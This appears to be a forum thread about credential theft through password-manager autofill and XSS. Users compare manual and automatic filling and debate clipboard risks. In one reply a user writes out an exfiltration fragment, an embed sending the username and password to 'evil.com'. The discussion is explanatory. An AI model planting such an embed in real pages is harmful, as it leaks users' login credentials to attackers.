I like password managers. It keeps people from writing them down on your desk or a notepad, so I'm all for it. I hate autofill. Any form of autofill, automated, user request, any of it. I would like people to just use a small button to open a 'mini instance' of the password manager, like an instant app (or app clips for iphones), and copy your password that way. Autofill is also a huge security risk, excluding if the…
Autofill in password managers can allow login credentials to be stolen
21–30 of 144 posts
Re: Autofill in password managers can allow login credentials to be stolen
#22Bitwarden uses manual autofill which is nice. You hit ctrl shift L to fill
To Downvoters: So in the PoC [0] with the default settings the author is completely wrong about their findings? even if you 'manually' autofill in the fields?
So you are saying that the password DOESN'T get extracted out of Bitwarden from a different subdomain than where the login data was stored on by default then?
Re: Autofill in password managers can allow login credentials to be stolen
#23So what? What am I missing?
How will he exfiltrate the data? With JS that posts it to another domain?
Re: Autofill in password managers can allow login credentials to be stolen
#24Earlier quoted context omitted.
If the attacker has access to your device, you're going to be severely compromised no matter what you do. Why pretend otherwise?
True, if an attacker has control of your device you are probably screwed anyway, but there are still different degrees of screwed. There are more and less privileged portions of your system, and keeping sensitive data to less secure areas is still not a great idea. With browsers offering clipboard access as a JavaScript API, it is definitely an area I would consider less well secured than, say, read protected memory…
Re: Autofill in password managers can allow login credentials to be stolen
#25Perhaps I'm slow. But if someone's discovered an XSS vulnerability for the site you're on, can't they just as well steal your password when you type it in?
Except, if there is XSS, its usually in user submitted data, like a post. You wouldn't type in your password on a user post or alert box. And the login page is usually on a different page altogether, by itself.
Re: Autofill in password managers can allow login credentials to be stolen
#26Earlier quoted context omitted.
If the attacker has access to your device, you're going to be severely compromised no matter what you do. Why pretend otherwise?
Both of you're statements are valid. If an attacker has access to your device you are *severely* compromised and you can't do much. I am going off the idea that your password manager clears your clipboard history however, but this is a valid and true statement. The thing is: nothing will be 100% secure. Ever. But if we evolve our security at the same rate loopholes, etc are being found, we can prevent data breaches,…
Re: Autofill in password managers can allow login credentials to be stolen
#27I don’t see the vulnerability. His demo collects credentials then displays them ... all on the same domain websecurity.dev So what? What am I missing? How will he exfiltrate the data? With JS that posts it to another domain?
Re: Autofill in password managers can allow login credentials to be stolen
#28Good advice. Ever since Tavis Ormandy set his sights on password managers, I have been a very sceptical user. I still use 1Password, but without the browser extension. Putting autofill aside, there's a couple of other concerns I have. I am hesitant about recommending a password manager to the tech illiterate simply because one piece of malware could compromise the entire vault. In that respect, a sticky note is argua…
Re: Autofill in password managers can allow login credentials to be stolen
#29I don’t see the vulnerability. His demo collects credentials then displays them ... all on the same domain websecurity.dev So what? What am I missing? How will he exfiltrate the data? With JS that posts it to another domain?
Exactly. Alternatively, you can also use embeds, for example `https://evil.com/$user/$password" >`.
If you have your code running and the credentials, exfiltration is no longer a problem.
Re: Autofill in password managers can allow login credentials to be stolen
#30Earlier quoted context omitted.
True, if an attacker has control of your device you are probably screwed anyway, but there are still different degrees of screwed. There are more and less privileged portions of your system, and keeping sensitive data to less secure areas is still not a great idea. With browsers offering clipboard access as a JavaScript API, it is definitely an area I would consider less well secured than, say, read protected memory…
Fair point, but I don't think you can _read_ the contents of the system clipboard, can you? I thought you could set it but had to wait for a paste event to read it.